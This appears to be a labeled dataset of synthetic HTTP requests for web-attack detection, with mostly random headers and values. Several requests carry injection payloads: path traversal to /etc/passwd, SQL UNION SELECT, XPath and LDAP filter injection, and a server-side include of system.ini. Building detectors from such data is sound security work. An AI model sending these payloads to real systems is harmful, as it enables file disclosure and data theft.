ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: 100-continue
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 4
MIME-Version: 3.6
Pragma: raayo5=trAnsspa
Proxy-Authorization: Digest qop=evai40
Authorization: Basic b1l0c2U6OHRuaUFscw==
Range: 220-5761,42620-
Referer: http://www.naKeImj.net/s4oahd/lt9prhd/Tgsg.mpeg
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 7.1; 60-6o; rv:9.8.6) Gecko/85991211
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 4.4 176.45.158.137, FTP/3.3 144.100.8.10
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45240
Start - Id: 46463
class: PathTransversal
POST /lpn60gmeOE6/Q8_a4-gandnU3/ioam5nSrebreOf6o/bne/s1/s7arnseep9If7I4iMe/ntdcBiRsvEvoa2smapo/gP/DselectformWvhHoRncnph-EI/zYmailPa.html? HTTP/1.0
Content-Length: 227
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 18 May 04 01:49:08 CET
Host: www.nts4reNa.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-15;q=0.3, x-mac-japanese;q=0.3, x-mac-arabic;q=0.1, x-mac-hebrew
Accept-Language: mhry-pndinp26;q=0.4, m-l
Cache-Control: no-cache
Client-ip: 30.16.235.7
Cookie: nnhhne=raeeenteamsh1h;execAQ9@C5=tzkpMhqMdl;PiLU=\.\.\/\.\.\/etc\/passwd
Date: Thu, 26 Mar 09 20:47:44 GMT
If-Modified-Since: Mon, 19 Jul 04 13:42:00 CET
If-Unmodified-Since: Thu, 21 Feb 08 13:44:13 CET
If-Match: *
If-None-Match: *
Range: 9-2,4086-,-13
Referer: http://www.hcitgsa.cz/iharhei9/tysrp/5gohrm/sxtp2/olni.mdb
TE: trailers,trailers,gzip
User-Agent: wSIn4txx http://www.ty6oyY.fr

lre0radbsm=uniono0wn8%rt&irzset0eLtsdre=oItFaaLgoadzt&tsEr=7v&hnsNowpt3Cvw=zLpJo&rnxdEees2=she5/cssp4]n+em aiit&buebqe=xn&z7PDDyFK=763&oJOvF6MphpGq@=Eutxa&Kevalux=oe&netcat7insertw=Solhra5a5Osep&melEnnneZat=@et6iiaa9n

End - Id: 46463
Start - Id: 49022
class: XPathInjection
GET /folumNageoxneeheeLd/eRM/y7@1PpILL5pIH_/5iGS/n.GFww_ZKeY/qw/eayee7it/syuH1AZxB.K.4MdN/sUHtqltzUZQabJuyvvU/nsioenthco2ett.sh?ebwyLso=home%3BpAwherezeo&1YJ4T3@LlibetcT=f8to1ypiryzTdmw2&oltsretNDrn5=qdrprad&ru=in&oim6erunr=drLen%2FxSwepa%2Fyastia%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D381%5D++++or+++%27eWc%27++%3D++%27&WyD9NL=tloeui%26r%24%3Do+ep&huitieepodnhe=ubo&gYg=9f8oe4Enrd+jy3n&Vullrzaja=ab2&rroTljietio=banEzcn&bsosfnlesduy=tTevsoeest&endrhO=19779579&mnju=6887004052&ly2ee4rI=54424 HTTP/1.1
Host: 241.125.138.238
Connection: hggnmeih
Accept: */*;q=0.6
Accept-Charset: us-ascii;q=0.2, ks_c_5601-1987;q=0.2
Accept-Encoding: gzip;q=0.1, identity;q=0.7, deflate;q=0.7, compress;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 89.184.173.185
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Sat, 10 Nov 07 20:15:40 CET
ETag: "hqas.qShK2Qyew_tqh"
Expect: an8s
From: roe6vyn@fada.it
If-Modified-Since: Sun, 10 Feb 08 18:26:22 UTC
If-Unmodified-Since: Mon, 15 Jun 09 20:16:34 UTC
If-Match: "Ed3i-XvroSmJ0AiKxP"
If-None-Match: "ty_Ki87YMOpe8dpkshkX"
If-Range: Sat, 02 Jan 10 15:17:11 UTC
Max-Forwards: 136
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: Basic MWVtaG5uOmlsdGRp
Range: -31
Referer: http://www.gion8b.ch/csersi/wtrtdn3/49ie.png
TE: chunked;q=0.7,chunked
Trailer: Warning
User-Agent: A5d8g3wI/9.7.8.8
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 729105256131367
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49022
Start - Id: 36281
class: PathTransversal
GET /asf9al80Sl1x/aifaa3ytt0us7sakc/gpaf6hsgq/h0AASm/ifmdaw/hVPP2@D.HIl9PD/p%ubY43rshutdownF6/rAOFH1NbaICRP3q2/laueWDae/agD8s.tiff?3XFwinntEG_cCl9u=eEu4f&n9r=3k&NsorrecotcA6tt=16&bvcet9eEotl=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&1ueCsc0a=1614657&VpTxLv=hUl4u&de02sferm9e=aU9esosxtoh&autdbfoss=tEyx9q..WvNw&rhuieiase72=teegcrId&Yahsti=oz%3Edydearuo%3Fvippu HTTP/1.1
Host: 176.156.130.214
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, iso-8859-9, iso-2022-kr;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 114.100.144.6
Cookie: gnt73qfo=57;l6=s~ :;icplavsdfwsSnT=z34;nlnnoAGCb6bsvwe=T9haunocldEKqo0r68;ekdzevnaLh=Meconnecte;enrXs=546
Cookie2: $Version="13"
Date: Sat, 15 Jul 06 01:47:31 GMT
ETag: W/"9BVqFjumZrGDUWhR"
Expect: eeoeO=e3rsdt9
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Sun, 30 Mar 08 05:58:41 CET
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: "I_lM8h_X2LcpVp2.CIA"
Max-Forwards: 067
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: nn1f lpedplel=eTmto
Range: 507970-,9199-
Referer: http://www.aaat.uk/Yott.jpeg
TE: trailers,gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/5.2 (compatible; MSIE 7.4; SunOS sun4u; q5p6oi; l6sAmr; ecaai)
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 0.7 www.utnH.tiff, FTP/4.7 38.80.154.241
Transfer-Encoding: identity
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36281
Start - Id: 48401
class: XPathInjection
GET /o_avx.9SjPlC/syego9qns0t0rT/tZtWREfG16/Rhnns6a/dopfrePdiwths/re9At3R1L@Xc72r25/ui@ccegKxRsqcaZXe/kiatefe5RcaU4wmoeau/iL1eLmem/ui2tla1plnhancoi7/Evtlroen1Ctm8poE8er.jpeg?4kDeiAtyidli=phh6osatrt&stanhiAmimi=9aeeisErobohscaetn&ceru5er9e=9991&xCjWmH=ssiemeta3%2Bec HTTP/1.1
Host: 78.112.108.241
Connection: o76ohr
Accept: application/*;q=0.5, audio/*;q=0.8
Accept-Charset: x-mac-roman, iso-8859-6;q=0.1, euc-jp;q=0.1, x-mac-japanese;q=0.9, x-mac-hebrew
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: 0=mh
Client-ip: 238.173.44.115
Cookie: NsnidDENNformJ=35975 or    1<    jUat/amyo/aonsa/child::text()[position()=3]    or   56202='] | /* | /foo[bar='
Cookie2: $Version="0"
Date: Thu, 30 Sep 04 21:52:13 GMT
ETag: W/"Gqax0ylWgLa_Q4qM"
Expect: 100-continue
From: geiEtz@rYpta.de
If-Modified-Since: Sun, 09 Aug 09 18:49:00 CET
If-Unmodified-Since: Fri, 31 Oct 08 14:17:40 UTC
If-Match: "b995iqoXu6EDEOKAo"
If-None-Match: "PxK2QpHmWFFDqRF"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.4
Pragma: h1i='bhr9hpe'
Proxy-Authorization: Basic c25yc3Npbjp0RWVlaA==
Authorization: NTLM NG9FeGhzdG9ob3RvZmgyYXJ2NW9oYWRleXNuc2JUaGVlU0FtdG14Z3I3
Range: 32-
Referer: /i7atut2e.swf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: u7ritf
UA-CPU: Sparc
UA-Disp: 574,086,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 141x150
Via: FTP/9.1 137.30.52.255, 7.3 233.98.40.170
Transfer-Encoding: aafrm3
Upgrade: qilofs/3.4, hho/6.8
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 214.199.174.38
X-Serial-Number: 977334560600879
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48401
Start - Id: 42089
class: SqlInjection
GET /oeQT6.K@37MSm0KE0fG.cgi?krpot=%27+++++UNION+++++++ALL+++++++++++SELECT+++usdAnc3o+++++FROM++++hdAI5ils+++++WHERE++++%27%27++%3D+++%27&dchenri1e8j=mochasir0 HTTP/1.0
Host: 54.157.192.208
Connection: keep-alive
Accept: audio/x-wav, application/*;q=0.7, video/*
Accept-Charset: cp-932, macintosh;q=0.9, x-mac-turkish, cp-936, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=42
Client-ip: 44.233.251.244
Cookie: mn8iVautoexecw=90663
Cookie2: $Version="940"
Date: Wed, 21 Nov 07 09:49:04 CET
ETag: "EWRt_zJA_S@SSc6R5j"
Expect: bu7dtjr
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 13 May 05 05:31:51 CET
If-Unmodified-Since: Wed, 22 Apr 09 13:59:03 UTC
If-Match: "__O3SF7HBl9NEex_u6r8"
If-None-Match: *
If-Range: Fri, 19 Jan 07 23:39:19 GMT
Max-Forwards: 4932
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: -951
Referer: http://tgEcfemo.st/lhhadRo/x1ew/auyh4/2ayo/oted.sh
TE: deflate;q=0.1
Trailer: If-Match
User-Agent: Mozilla/6.7 (Windows; U; WinNT 2.6; th-rh; rv:5.6.3) Gecko/53952577
UA-CPU: x86
UA-Disp: 7402,9004,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4728x9077
Via: 6.6 17.200.7.34, 70v/6.3 www.s74htkqe.jpg, 4.7 220.159.212.171
Transfer-Encoding: gzip
Upgrade: z6NS/9.8, Brl/1.0, ets/2.0
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42089
Start - Id: 35493
class: XPathInjection
GET /OoEdi/r1U-DEn6QL/tFlade6i/euIPOEm648bg/3M65@83loOsq.msf?COElocationcconnectizzwHxterm=570012950&1_VPA=aa6Z96vH&tttg=Wi+o%28&oOnn5AieDBra=iframewu%3ERhtt%3B&tNe=pr82VC0mvs&7swsrbe9hhf=z8Aashiote&eR8benteiejm=u2oQuX4sP14Y&AaaYD6.a8EeL=888 HTTP/1.0
Host: 63.18.167.24
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-roman, windows-1251;q=0.3, cp-936, iso-8859-5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 226.254.28.174
Cookie: 9thtcSf5abss=catih;casltport=32;rnesetai6o2ie=Qa;nep9oosDoefch=6forme;etgera=81;adfetn6ftdg=alcni' or    n/l6rkiw/child::node()[processing-instruction()=8] or     'naua0g'    ='
Cookie2: $Version="4"
Date: Wed, 24 Nov 04 11:04:12 GMT
ETag: W/"tiivAPoMMzogU-aEGqo"
Expect: annafei=outUe5;w4Pna=itnob
From: a8rg@iaaSadh.uk
If-Modified-Since: Mon, 22 Aug 05 16:03:26 CET
If-Unmodified-Since: Fri, 06 Aug 04 01:38:21 CET
If-Match: *
If-None-Match: "74S8bLTrQi.9Ark7h"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: eaenr2g=ulsaI
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: N373pa nrenh=iswsnx
Range: 2-37781,-037,39-
Referer: http://ctdde.fr/oSenMh/emmymnee/gEhEoscm/Wget0h.sh
TE: gzip,chunked,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.4 (Windows; U; WinNT 2.6; 7h-cs; rv:4.0.7) Gecko/13749479
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3268x9277
Via: c1se/3.8 12.20.46.49:97, dub/3.8 www.2ohl7.gif:05616, 2.3 211.4.255.188
Transfer-Encoding: identity
Upgrade: 0ci/4.0, N16n/4.6
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35493
Start - Id: 41856
class: SqlInjection
GET /cWX21N7xGCTyxM/breeztslrTtnaeioih/ielleo/lat1/roleswziAoe8muhex0/GipTrcpa/bxeyWxn_lq6S7zPKQ5/aggMJ/9O@CVz/0lsih2.swf?ua=ilocationotspatcaad&ottti=heservicestenaroHw%29S&5Khi8=OR+++++%27er6dheoL%27+++++%3D+N%27+%27&edetd=1637&bueei=dQms7QIKI&ytttow=%40n&hbanme=hLO&nda0zanzeolEa3=sb%5Cenull%25crr+rnvo+ioconnecteu HTTP/1.0
Host: www.0tee.fr
Connection: ted7stqe
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 78.57.136.131
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="965"
Date: Thu, 08 Sep 05 22:05:38 GMT
ETag: "a2V9IycN6MWKRF29Nv"
Expect: rpih
From: hth8n7i@4gf4.de
If-Modified-Since: Fri, 04 Dec 09 20:35:33 UTC
If-Unmodified-Since: Sun, 17 Sep 06 23:59:17 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 18 May 06 24:27:09 CET
Max-Forwards: 0
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: Basic ZXJlT2Q5OmUwaXZkc3Nl
Range: -521,-331719
Referer: /3o3tks/nuziO.mpg
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: tVdUBZZm http://www.mwxe.it
UA-CPU: PowerPC
UA-Disp: 7520,1896,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 10397953831192510
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41856
Start - Id: 44724
class: PathTransversal
PUT /zss/te9yevetauAta/rmopnantbT/ekn8/ehreaoe/qKsCUqCX/r6BWFvsWF-P45B/W4httpXxKSFftpa/ae28waftoMe/Y3cr1@-/aeTe19or/tsmtdnew.html? HTTP/1.0
Content-Length: 175
Content-Language: l
Content-Encoding: compress
Content-Location: http://r3dzna.be/ni7ea/vlohgu0n/vniEtsh/er3scs.sh
Content-MD5: QWh3ZHJTYUl0c2x0bm5ocw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 04 14:54:25 GMT
Last-Modified: Wed, 27 Oct 04 03:02:06 CET
Host: 197.73.109.250
Connection: iaoahsXt
Accept: application/rtf;q=0.1, application/rtf, text/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.5, deflate;q=0.5
Accept-Language: glv-aonwds, 7drohnae-ao;q=0.1, fcwT-1tDee, pA29ttIG-anneis, h-isnoe;q=0.7
Cache-Control: min-fresh=5
Cookie2: $Version="8"
Date: Sat, 16 Jun 07 15:56:38 CET
ETag: "nDW.3xXQFDtpZ72"
Expect: 3tnOdwe7=nohiayee
If-Modified-Since: Fri, 15 Aug 08 02:55:37 GMT
If-Match: *
If-None-Match: "@uzshwqJtWXym8e"
If-Range: *
Max-Forwards: 629
Pragma: eyien=8ns
Authorization: Digest nonce
Referer: /zln9sar/d7rauga/93ae.php
User-Agent: bfLnhgue/6.2.1
Via: htn/1.6 www.bHid.jpg, 8.7 241.137.9.191, 9.4 188.109.92.187
Warning: 171 www.poWtolr.css:59 "eOArs" "Tue, 15 May 07 13:40:14 UTC"

Tactt3edielaete=iA2gMulpENeJi9&gen=./.././../&rnemeueseEx=smnrsnyta&edadOMsetfll4u7=y.dCg&ehkS=1]la8Ff>&raklwmpnjcFitx3=549&o8o=ab'a&tmuuaeof=erud%&dcyrsty=267

End - Id: 44724
Start - Id: 35200
class: SqlInjection
GET /hb/mrIG.BUk_BA277/mdtNsfcjass/teamodn0enodv55y/db/i0nok8ibzoCQjGQMY-.gif?Twdi=i_Zw9-bk&Utl=%27%29+UNION++++ALL++++SELECT+247+++++FROM++++sttmtzre+++++WHERE+++%28++%27%27+%3D+++%27&Vzh23cc3BOT=heR&oeYnogfSo=htpassprc%5Dlhcrd+&xrsih8=cb3aifcfoem&rsr=EShhtethiet HTTP/1.0
Host: www.aafedoot.ch
Connection: close
Accept: audio/*;q=0.5, application/*, audio/basic;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ftjixnt-hntarchE, fot8saDl-s;q=0.5, t-eimh4d3
Cache-Control: only-if-cached
Client-ip: 78.116.124.236
Cookie: qjPdocument=otail;rnnt=smaqise
Cookie2: $Version="703"
Date: Tue, 23 Dec 08 14:03:12 CET
ETag: "oJj9dXVOzYu6K3_qCx"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Sat, 11 Mar 06 09:02:35 CET
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "Km7KKJO3GBaAtLOqHxU"
If-None-Match: *
If-Range: Sat, 21 Apr 07 23:44:59 CET
Max-Forwards: 0292
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM YXUzaHQyWXNPYWFvZHR0dDJobEFpTUNub3RvZmplZTljclRFbmVyNXRwc2FhZTk=
Range: 91-
Referer: http://www.iseurma.ch/eh8c/ddiaiq.zip
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: cheshD0c (afW9BLT; sN22ErtJO; izok-I; s1dCPKf1; esro_ym2)
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: HTTP/4.2 9.245.55.22, HTTP/3.5 www.ajt6m.jpg
Transfer-Encoding: compress
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35200
Start - Id: 49244
class: XPathInjection
GET /nggmuq7sHdg/M7fuh5DsamG-/aeshjsSmt/afUBQQP-T/uV6UHE/odh1eTzVN/hrihdkaa/ru5eQ/roicts5r9mas/so6gwtMydo.css?odtrlecfTnhg=ae%27++++or++P%2Fclrmn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D+or+%27l9tcmntO%27+++%3D+%27&ieCish=%26tt+%29 HTTP/1.1
Host: www.ucrhdz3d.ch
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: heusNk9-uotmgU, c-0mtancg, kosmedn-ndspWd
Cache-Control: no-cache
Client-ip: 200.206.243.113
Cookie: micaioerygcofn=ur
Cookie2: $Version="1"
Date: Fri, 19 May 06 15:34:28 UTC
ETag: "k0tNy17@VGo1UDQzY0"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Wed, 30 Sep 09 13:20:31 UTC
If-Unmodified-Since: Thu, 02 Dec 04 01:58:00 GMT
If-Match: "NKB9@0dImMA9_c."
If-None-Match: *
If-Range: Fri, 18 Nov 05 21:03:53 GMT
Max-Forwards: 1576
MIME-Version: 9.4
Pragma: 97s='aj'
Proxy-Authorization: Digest realm
Authorization: Basic ZTNhdHg6cGRlYmVsdTM=
Range: -364650
Referer: http://www.sddLe.fr/inpRh.tiff
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: Mozilla/7.8 (X11; U; Open BSD i386 4.5; ao-tC; rv:0.2.5) Gecko/81957883
UA-CPU: 68000
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 4.5 8.224.35.56, 0.5 www.f4Aa.css
Transfer-Encoding: gzip
Upgrade: ja8xa/5.6
Warning: 066 www.lqoEr.jpg "ls5eia" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49244
Start - Id: 41385
class: SqlInjection
PUT /tcvscript9tcatqP45group byG/sRanOry5ydeglumamoug/8qrI8K6fsEjg/oNSU1lG_L1t3y3t/heraln5rI/dFK1XTssYNh0q3n8F/nhlrvajewriae4dhi.gif? HTTP/1.1
Content-Length: 86
Content-Language: e,bdr
Content-Encoding: deflate
Content-Location: /iookrc/esm4eiro/as3t7fps/pltlos/alu2ehhd.jpeg
Content-MD5: YWVlYW10dHNpVHRhZWx0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Dec 07 16:04:54 CET
Last-Modified: Thu, 15 Mar 07 04:03:16 GMT
Host: 155.86.103.201
Connection: keep-alive
Accept: image/gif;q=0.3, video/*;q=0.1, application/postscript;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 93.72.204.142
Cookie: ngtD=2YhR8R;esEeish=3c82I4.IL2iT;seaYhrMpzlna5r=3
Cookie2: $Version="747"
Date: Thu, 10 Jul 08 03:16:48 GMT
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: eFdpx@Molwro.de
If-Modified-Since: Thu, 06 Dec 07 02:24:43 UTC
If-Unmodified-Since: Fri, 31 Aug 07 08:01:52 GMT
If-Match: "BxRvptb0fj4ZWdG25NL"
If-None-Match: *
If-Range: *
Max-Forwards: 3892
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest algorithm=ahIeaoa
Range: -9924,02717-,6-82569
Referer: http://www.Oejaigoa.uk/ihee.zip
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: nOybgecet
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: bwir7/9.5, 0rA2/5.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

soy76jliRit='  )     UNION ALL SELECT 96  FROM   6f WHERE   (  ''  =   '

End - Id: 41385
Start - Id: 38274
class: LdapInjection
GET /Oenmjrcfahmdeie4snt.css?QStmpIzjFreplaceD=ftandm&y9sodro3S=asosneaonh&aedans=1756853&ZjJKpN84u1=uehcatlo%7E8&te=ro&tedal=%27edut%29f%2Bol3mhtpassn&eknt7eotiNnOroN=2704%29%28%26%28objectClass%3Dae3o%29%28%7C%28sn%3DNa%29%28cn%3Dd9+++J*%29%29&mh=rtslr&5euafCuireOsnl=nNrQNH5wZH&rnp=aic%26i%7CirhtrcoZt&td12soaIs7i=2&6RqXIalc5httpsaccept=cIrna+%24r6oor&y6VpD.n.Yg=cnu HTTP/1.1
Host: 111.128.136.5:70
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-ce, iso-8859-9;q=0.6
Accept-Encoding: compress, identity;q=0.2
Accept-Language: Hns-heae;q=0.0, m4l0s-im
Cache-Control: only-if-cached
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="30"
Date: Thu, 21 Apr 05 03:10:04 UTC
ETag: "YAtQRZ8M5wKeOH1a4o"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: Tue, 16 Nov 04 18:44:11 GMT
Max-Forwards: 2
MIME-Version: 0.2
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: Digest username="mscm"
Authorization: Basic aWQ5aHNoZTpubnlmdA==
Range: 2323-,18-
Referer: http://www.niaG1Vet.com/w02mR57x/llo5br/f4mEnan/dnNi/rqertmsP.mpg
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: 2aBe0angw7b3ihzt
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: 5caiho; ciuh=ht7qou
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 70527822
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38274
Start - Id: 40556
class: SSI
GET /logconnecta8/wt/hu0NJHYEiOwuHEN0B1z/9vbscriptxSc/lurt7nO8qUzVj8q_RqzN/cjGNR7Fc_FGyh7O.dll?J6ZGOwDyyiv=nc2ema&auIaetioal=06355541&e5cwaeasa=5frt8a0&rogbn=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&sterNthe7lf=509811&andD7mztc=mttaesl%5Dt%2Fmaed HTTP/1.1
Host: www.o3ud.st:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate, deflate;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 194.18.169.91
Cookie: Btieo5m0iaae=eed;Sokdi=i;oyelh=0Yrpositione
Cookie2: $Version="29"
Date: Thu, 28 Dec 06 12:10:21 UTC
ETag: "ssglHMX_9cM_DOyMAcT"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Mon, 29 May 06 14:13:58 CET
If-Unmodified-Since: Mon, 12 Feb 07 22:37:23 UTC
If-Match: "SMsjtCLDUnplI_J"
If-None-Match: *
If-Range: Tue, 31 Oct 06 03:30:01 UTC
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest nc=04bCfCaa
Range: 092301-3,261-278,-586839
Referer: /yael7et/Sht6a0l/nwnMq/0xhjei4.php
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/8.2 (Windows; U; Windows NT 4.4; hr-0m; rv:8.8.5) Gecko/05347875
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: tncp/6.3 200.187.86.17, 4.0 www.n3sc.css
Transfer-Encoding: identity
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
